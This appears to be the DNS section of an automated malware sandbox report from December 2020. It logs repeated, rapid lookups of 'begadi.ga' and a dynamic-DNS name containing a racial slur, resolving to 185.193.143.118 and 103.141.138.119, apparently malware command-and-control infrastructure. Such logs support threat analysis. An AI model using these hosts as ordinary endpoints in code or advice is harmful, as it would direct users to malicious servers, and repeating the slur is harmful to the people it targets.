Dec 21, 2020 08:34:24.340230942 CET	192.168.2.22	8.8.8.8	0x734b	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:24.808307886 CET	192.168.2.22	8.8.8.8	0x1864	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:25.262887001 CET	192.168.2.22	8.8.8.8	0x6fa5	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:25.710551977 CET	192.168.2.22	8.8.8.8	0xb236	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:26.160768032 CET	192.168.2.22	8.8.8.8	0x694b	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:26.614681959 CET	192.168.2.22	8.8.8.8	0xb0ef	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:27.062807083 CET	192.168.2.22	8.8.8.8	0xb38	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:27.520749092 CET	192.168.2.22	8.8.8.8	0xd747	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:27.986989021 CET	192.168.2.22	8.8.8.8	0x77b8	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:28.446234941 CET	192.168.2.22	8.8.8.8	0x617c	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:28.886102915 CET	192.168.2.22	8.8.8.8	0x202	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:29.338663101 CET	192.168.2.22	8.8.8.8	0x7c63	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:29.768058062 CET	192.168.2.22	8.8.8.8	0x5ee0	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:30.464324951 CET	192.168.2.22	8.8.8.8	0xa6f6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:31.077270031 CET	192.168.2.22	8.8.8.8	0x1ba9	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:31.530584097 CET	192.168.2.22	8.8.8.8	0xe63e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:31.997639894 CET	192.168.2.22	8.8.8.8	0x888e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:32.732549906 CET	192.168.2.22	8.8.8.8	0x65dd	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:33.196446896 CET	192.168.2.22	8.8.8.8	0x64fa	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:33.646843910 CET	192.168.2.22	8.8.8.8	0x5a90	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:34.237993002 CET	192.168.2.22	8.8.8.8	0x4033	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:34.832995892 CET	192.168.2.22	8.8.8.8	0xfe2d	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:35.595055103 CET	192.168.2.22	8.8.8.8	0x4ad4	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:36.298094034 CET	192.168.2.22	8.8.8.8	0xfcbf	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:36.745827913 CET	192.168.2.22	8.8.8.8	0xf28f	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:37.184614897 CET	192.168.2.22	8.8.8.8	0x6d7e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:37.667687893 CET	192.168.2.22	8.8.8.8	0x2da4	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:38.116018057 CET	192.168.2.22	8.8.8.8	0xf6c3	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:38.580862999 CET	192.168.2.22	8.8.8.8	0xf948	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:39.014872074 CET	192.168.2.22	8.8.8.8	0x5ed7	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:39.460103035 CET	192.168.2.22	8.8.8.8	0x19f	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:39.922630072 CET	192.168.2.22	8.8.8.8	0x6bdc	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:40.387022018 CET	192.168.2.22	8.8.8.8	0xed92	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:40.870759010 CET	192.168.2.22	8.8.8.8	0x6d8f	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:41.326885939 CET	192.168.2.22	8.8.8.8	0x4c89	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:41.787194967 CET	192.168.2.22	8.8.8.8	0x7dc6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:42.230077028 CET	192.168.2.22	8.8.8.8	0xc3b2	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:42.685045958 CET	192.168.2.22	8.8.8.8	0x84fe	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:43.125950098 CET	192.168.2.22	8.8.8.8	0x5b58	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:43.560400009 CET	192.168.2.22	8.8.8.8	0xb6a4	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:44.009450912 CET	192.168.2.22	8.8.8.8	0x34bc	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:44.446667910 CET	192.168.2.22	8.8.8.8	0xc12d	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:44.919285059 CET	192.168.2.22	8.8.8.8	0x5ed5	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:45.405236959 CET	192.168.2.22	8.8.8.8	0x9a94	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:45.873823881 CET	192.168.2.22	8.8.8.8	0xd4e0	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:46.292246103 CET	192.168.2.22	8.8.8.8	0x14b7	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:46.737219095 CET	192.168.2.22	8.8.8.8	0x5e2c	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:47.190372944 CET	192.168.2.22	8.8.8.8	0xe624	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:47.621474028 CET	192.168.2.22	8.8.8.8	0x4e4e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:48.633337975 CET	192.168.2.22	8.8.8.8	0x4e4e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:49.651582956 CET	192.168.2.22	8.8.8.8	0x4e4e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:50.100256920 CET	192.168.2.22	8.8.8.8	0xedc0	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:50.556056976 CET	192.168.2.22	8.8.8.8	0xeb9	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:51.002749920 CET	192.168.2.22	8.8.8.8	0xbbeb	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:51.549300909 CET	192.168.2.22	8.8.8.8	0x5348	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:51.980609894 CET	192.168.2.22	8.8.8.8	0xfc79	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:53.237574100 CET	192.168.2.22	8.8.8.8	0x78a1	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:53.671439886 CET	192.168.2.22	8.8.8.8	0x18c2	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:54.125663996 CET	192.168.2.22	8.8.8.8	0xb8aa	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:54.601530075 CET	192.168.2.22	8.8.8.8	0x65b7	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:55.073710918 CET	192.168.2.22	8.8.8.8	0x7104	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:55.533246040 CET	192.168.2.22	8.8.8.8	0x8aa4	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:55.991848946 CET	192.168.2.22	8.8.8.8	0xd2ed	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:56.432776928 CET	192.168.2.22	8.8.8.8	0xa776	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:56.894483089 CET	192.168.2.22	8.8.8.8	0x747a	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:57.346008062 CET	192.168.2.22	8.8.8.8	0x1554	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:57.803312063 CET	192.168.2.22	8.8.8.8	0x980b	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:58.262943029 CET	192.168.2.22	8.8.8.8	0xda8e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:58.711656094 CET	192.168.2.22	8.8.8.8	0xe33f	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:59.157669067 CET	192.168.2.22	8.8.8.8	0xc079	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:59.615947008 CET	192.168.2.22	8.8.8.8	0x6088	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:00.071464062 CET	192.168.2.22	8.8.8.8	0x99bd	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:00.519056082 CET	192.168.2.22	8.8.8.8	0xf6c8	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:00.951364994 CET	192.168.2.22	8.8.8.8	0x49c8	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:01.390788078 CET	192.168.2.22	8.8.8.8	0x2265	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:01.849296093 CET	192.168.2.22	8.8.8.8	0xbb03	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:02.301299095 CET	192.168.2.22	8.8.8.8	0x59f4	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:35:02.741864920 CET	192.168.2.22	8.8.8.8	0xaa23	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 21, 2020 08:33:20.141259909 CET	8.8.8.8	192.168.2.22	0x211b	No error (0)	chnesstdyqudusisabadassniggainthestfmv.ydns.eu	103.141.138.119	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:20.181081057 CET	8.8.8.8	192.168.2.22	0x211b	No error (0)	chnesstdyqudusisabadassniggainthestfmv.ydns.eu	103.141.138.119	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:32.245913982 CET	8.8.8.8	192.168.2.22	0x3397	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:33.027492046 CET	8.8.8.8	192.168.2.22	0x6b88	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:33.416837931 CET	8.8.8.8	192.168.2.22	0x5ac2	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:33.912573099 CET	8.8.8.8	192.168.2.22	0xff39	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:34.397540092 CET	8.8.8.8	192.168.2.22	0x5fb6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:34.913418055 CET	8.8.8.8	192.168.2.22	0x1b02	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:35.392252922 CET	8.8.8.8	192.168.2.22	0x4a26	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:35.873585939 CET	8.8.8.8	192.168.2.22	0xd57a	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:36.346338034 CET	8.8.8.8	192.168.2.22	0xf5d6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:36.841499090 CET	8.8.8.8	192.168.2.22	0x37e8	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:37.347301960 CET	8.8.8.8	192.168.2.22	0x2690	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:37.822774887 CET	8.8.8.8	192.168.2.22	0xdaa4	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:38.302434921 CET	8.8.8.8	192.168.2.22	0x2801	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:38.776042938 CET	8.8.8.8	192.168.2.22	0x5d56	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:39.253777027 CET	8.8.8.8	192.168.2.22	0x41db	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:39.744498014 CET	8.8.8.8	192.168.2.22	0x4455	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:40.229345083 CET	8.8.8.8	192.168.2.22	0xced7	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:40.677072048 CET	8.8.8.8	192.168.2.22	0xaae	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:41.149358988 CET	8.8.8.8	192.168.2.22	0xf263	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:41.640346050 CET	8.8.8.8	192.168.2.22	0xf523	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:42.118233919 CET	8.8.8.8	192.168.2.22	0xb44c	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:42.603332043 CET	8.8.8.8	192.168.2.22	0x1bf6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:43.056792021 CET	8.8.8.8	192.168.2.22	0x3407	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:43.542844057 CET	8.8.8.8	192.168.2.22	0xd35b	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:44.025953054 CET	8.8.8.8	192.168.2.22	0xa48	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:44.500294924 CET	8.8.8.8	192.168.2.22	0xbac1	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:44.982953072 CET	8.8.8.8	192.168.2.22	0x6328	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:45.462071896 CET	8.8.8.8	192.168.2.22	0x5df6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:45.929359913 CET	8.8.8.8	192.168.2.22	0xaa4a	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:46.440226078 CET	8.8.8.8	192.168.2.22	0xa122	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:46.882116079 CET	8.8.8.8	192.168.2.22	0xb6ff	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:47.365688086 CET	8.8.8.8	192.168.2.22	0x3dd8	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:47.838496923 CET	8.8.8.8	192.168.2.22	0xc326	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:48.329663038 CET	8.8.8.8	192.168.2.22	0xfbaa	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:48.799899101 CET	8.8.8.8	192.168.2.22	0x9447	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:49.272435904 CET	8.8.8.8	192.168.2.22	0x1f33	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:49.773880959 CET	8.8.8.8	192.168.2.22	0xc5a6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:50.234957933 CET	8.8.8.8	192.168.2.22	0xcac4	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:50.727616072 CET	8.8.8.8	192.168.2.22	0xb096	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:51.199632883 CET	8.8.8.8	192.168.2.22	0xb47e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:51.661459923 CET	8.8.8.8	192.168.2.22	0x5bf1	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:52.138839960 CET	8.8.8.8	192.168.2.22	0xed4e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:52.608187914 CET	8.8.8.8	192.168.2.22	0x5d81	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:53.089116096 CET	8.8.8.8	192.168.2.22	0x4d15	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:53.545923948 CET	8.8.8.8	192.168.2.22	0xb247	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:54.028563023 CET	8.8.8.8	192.168.2.22	0xd551	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:54.495980978 CET	8.8.8.8	192.168.2.22	0xaef1	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:54.950864077 CET	8.8.8.8	192.168.2.22	0x2f5b	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:55.396764994 CET	8.8.8.8	192.168.2.22	0x8fd0	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:58.138356924 CET	8.8.8.8	192.168.2.22	0xef23	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:58.600277901 CET	8.8.8.8	192.168.2.22	0x476b	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:59.074902058 CET	8.8.8.8	192.168.2.22	0xc2e9	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:59.538171053 CET	8.8.8.8	192.168.2.22	0x7013	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:59.999243975 CET	8.8.8.8	192.168.2.22	0x68ec	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:00.458333969 CET	8.8.8.8	192.168.2.22	0xd32f	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:00.927617073 CET	8.8.8.8	192.168.2.22	0xf721	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:01.370101929 CET	8.8.8.8	192.168.2.22	0x9374	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:01.813256025 CET	8.8.8.8	192.168.2.22	0x8596	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:02.234920025 CET	8.8.8.8	192.168.2.22	0x3e26	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:03.016529083 CET	8.8.8.8	192.168.2.22	0x6e6d	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:03.763997078 CET	8.8.8.8	192.168.2.22	0xe7ff	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:04.226470947 CET	8.8.8.8	192.168.2.22	0x95e8	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:04.662421942 CET	8.8.8.8	192.168.2.22	0xe5b1	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:05.116772890 CET	8.8.8.8	192.168.2.22	0x9f2d	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:05.564255953 CET	8.8.8.8	192.168.2.22	0x5352	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:06.008991003 CET	8.8.8.8	192.168.2.22	0x4f0f	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:06.452527046 CET	8.8.8.8	192.168.2.22	0x7d0e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:06.900445938 CET	8.8.8.8	192.168.2.22	0x42b0	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:07.365592957 CET	8.8.8.8	192.168.2.22	0xbedc	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:07.810790062 CET	8.8.8.8	192.168.2.22	0x8b5	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:08.260979891 CET	8.8.8.8	192.168.2.22	0x4597	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:08.709247112 CET	8.8.8.8	192.168.2.22	0x11a	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:09.166901112 CET	8.8.8.8	192.168.2.22	0x433f	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:09.613442898 CET	8.8.8.8	192.168.2.22	0x2e22	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:10.082566023 CET	8.8.8.8	192.168.2.22	0xeeaa	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:10.540024042 CET	8.8.8.8	192.168.2.22	0x9098	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:10.974487066 CET	8.8.8.8	192.168.2.22	0x1efc	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:11.435686111 CET	8.8.8.8	192.168.2.22	0x1ef9	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:11.866249084 CET	8.8.8.8	192.168.2.22	0x6af1	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:12.342263937 CET	8.8.8.8	192.168.2.22	0xcad	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:12.793176889 CET	8.8.8.8	192.168.2.22	0xe282	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:15.224958897 CET	8.8.8.8	192.168.2.22	0x4e37	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:15.657253981 CET	8.8.8.8	192.168.2.22	0xc5	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:16.098458052 CET	8.8.8.8	192.168.2.22	0x99b5	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:16.546869040 CET	8.8.8.8	192.168.2.22	0x7dc1	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:16.990459919 CET	8.8.8.8	192.168.2.22	0x11f3	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:17.481856108 CET	8.8.8.8	192.168.2.22	0x2e47	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:17.947513103 CET	8.8.8.8	192.168.2.22	0xdf58	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:18.384497881 CET	8.8.8.8	192.168.2.22	0xd0e6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:18.848465919 CET	8.8.8.8	192.168.2.22	0x36e	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:19.295341015 CET	8.8.8.8	192.168.2.22	0xcf0	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:19.740425110 CET	8.8.8.8	192.168.2.22	0x8499	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:20.202665091 CET	8.8.8.8	192.168.2.22	0xdcb2	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:20.648192883 CET	8.8.8.8	192.168.2.22	0xfd1c	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:21.093951941 CET	8.8.8.8	192.168.2.22	0xbbf9	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:21.545727968 CET	8.8.8.8	192.168.2.22	0xf9d0	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:21.984266996 CET	8.8.8.8	192.168.2.22	0x5928	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:22.435983896 CET	8.8.8.8	192.168.2.22	0xcf51	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:22.874603033 CET	8.8.8.8	192.168.2.22	0x3c9b	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:23.310132027 CET	8.8.8.8	192.168.2.22	0xb87	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:23.765877962 CET	8.8.8.8	192.168.2.22	0x80c6	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:24.373184919 CET	8.8.8.8	192.168.2.22	0x734b	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:24.835433960 CET	8.8.8.8	192.168.2.22	0x1864	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:25.289983988 CET	8.8.8.8	192.168.2.22	0x6fa5	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:25.736001968 CET	8.8.8.8	192.168.2.22	0xb236	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:26.185072899 CET	8.8.8.8	192.168.2.22	0x694b	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:26.638876915 CET	8.8.8.8	192.168.2.22	0xb0ef	No error (0)	begadi.ga	185.193.143.118	A (IP address)	IN (0x0001)
